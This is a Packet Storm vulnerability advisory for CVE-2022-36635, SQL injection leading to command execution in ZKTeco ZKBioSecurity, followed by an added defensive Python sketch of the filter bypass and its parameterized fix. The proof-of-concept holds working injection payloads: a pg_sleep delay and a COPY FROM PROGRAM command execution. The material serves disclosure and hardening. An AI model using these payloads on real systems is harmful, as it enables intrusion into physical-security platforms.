ZKSecurity BIO 4.1.2 SQL Injection / Code Execution

ZKSecurity BIO version 4.1.2 suffers from a remote SQL injection vulnerability that can allow for remote code execution.

Packet Storm
#######################ADVISORY INFORMATION#######################
Product: ZKSecurity BIO
Vendor: ZKTeco (https://www.zkteco.com/en/ZKBiosecurity/ZKBioSecurity_V5000_4.1.2)
Version Affected: 4.1.2
CVE: CVE-2022-36635
Vulnerability: SQL Injection (with a plus: RCE)

#######################CREDIT#######################
This vulnerability was discovered and researched by Caio Burgardt and Silton Santos.

#######################INTRODUCTION#######################
Based on hybrid biometric technology and computer vision technology, ZKBioSecurity provides a comprehensive web-based security platform. It contains multiple integrated modules: personnel, time & attendance, access control, visitor management, offline & online consumption management, guard patrol, parking, elevator control, entrance control, Facekiosk, intelligent video management, mask and temperature detection module, and other smart sub-systems.

#######################VULNERABILITY DETAILS#######################
The parameters opTimeBegin and opTimeEnd are simply concatenated into the SQL query, with only a sanitization filter in front of it. Using comments (/**/) in place of spaces was enough to confuse and bypass the filter.

#######################PROOF OF CONCEPT#######################
Note that the request is delayed by 10s:

POST /baseOpLog.do HTTP/1.1
Host: {HOST}
Content-Type: application/x-www-form-urlencoded
Cookie: SESSION={COOKIE}; menuType=icon-only
Content-Length: 208

list&pageSize=50&opTimeBegin=2022-06-26%2000:00:00')/**/tmp_count;select/**/pg_sleep(10);/**/select+1+from+BASE_OPLOG/**/WHERE/**/'1'='1&opTimeEnd=2022-09-26%2023:59:59&sortName=&sortOrder=&posStart=0&count=50

If you use the following query, you can execute a remote command:

list&pageSize=50&opTimeBegin=2022-04-11%2000:00:00&opTimeEnd=2022-07-11%2023:59:59')/**/tmp_count;DROP/**/TABLE/**/IF/**/EXISTS/**/cmd_exec;CREATE/**/TABLE/**/cmd_exec/**/(cmd_output/**/text);COPY/**/cmd_exec/**/FROM/**/PROGRAM/**/'ping+domain';SELECT/**/*/**/FROM/**/cmd_exec;/**/SeLECT/**/count/**/(1)/**/fRom/**/(SeLECT/**/t.CREATE_TIME/**/fROM/**/BASE_OPLOG/**/t/**/where/**/'1'='

#######################END#######################
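Added defender-side illustration of the root cause described above (example code, not from the advisory or from ZKTeco): a weak blacklist that only reacts to a keyword followed by whitespace, which is an assumption since the product's real filter is not published, is placed beside the fix an engineer would apply to opTimeBegin/opTimeEnd, an allow-list check on the timestamp format followed by a parameterized query. The table is a constructed in-memory SQLite stand-in for BASE_OPLOG.

```python
import re
import sqlite3

# Allow-list for the format baseOpLog.do expects in opTimeBegin/opTimeEnd
# (YYYY-MM-DD HH:MM:SS). Anything else, including SQL comments, is rejected.
TIMESTAMP_RE = re.compile(r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}")

# Illustrative weak filter (an assumption; the product's real filter is not
# published). It only rejects a SQL keyword followed by whitespace, so the
# comment /**/ that PostgreSQL treats as a separator slips straight through.
KEYWORD_SPACE_RE = re.compile(
    r"\b(select|insert|update|delete|drop|copy|union|or|and)\s+", re.I)


def keyword_space_filter(value: str) -> bool:
    """Return True if the weak blacklist accepts the value."""
    return KEYWORD_SPACE_RE.search(value) is None


def validate_timestamp(value: str) -> bool:
    """Return True only if the value is exactly one well-formed timestamp."""
    return TIMESTAMP_RE.fullmatch(value) is not None


def count_oplog(conn: sqlite3.Connection, begin: str, end: str) -> int:
    """Hardened form: allow-list validation, then bound parameters, so the
    values can never change the shape of the statement."""
    if not (validate_timestamp(begin) and validate_timestamp(end)):
        raise ValueError("opTimeBegin/opTimeEnd must be YYYY-MM-DD HH:MM:SS")
    row = conn.execute(
        "SELECT count(1) FROM base_oplog WHERE create_time BETWEEN ? AND ?",
        (begin, end),
    ).fetchone()
    return row[0]


def demo_connection() -> sqlite3.Connection:
    """Constructed in-memory table standing in for BASE_OPLOG."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE base_oplog (create_time TEXT)")
    conn.executemany("INSERT INTO base_oplog VALUES (?)",
                     [("2022-06-26 08:15:00",), ("2022-07-01 12:00:00",),
                      ("2022-09-30 23:00:00",)])
    return conn


# Constructed probe: a closing quote plus comments standing in for spaces,
# the shape of input the advisory says slipped past the filter.
PROBE = "2022-06-26 00:00:00'/**/OR/**/'1'='1"
```

The weak filter accepts the probe while the allow-list rejects it; with the allow-list and bound parameters in place the request either fails validation or counts only the rows inside the requested window.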

Related news

CVE-2022-36635

ZKteco ZKBioSecurity V5000 4.1.3 was discovered to contain a SQL injection vulnerability via the component /baseOpLog.do.
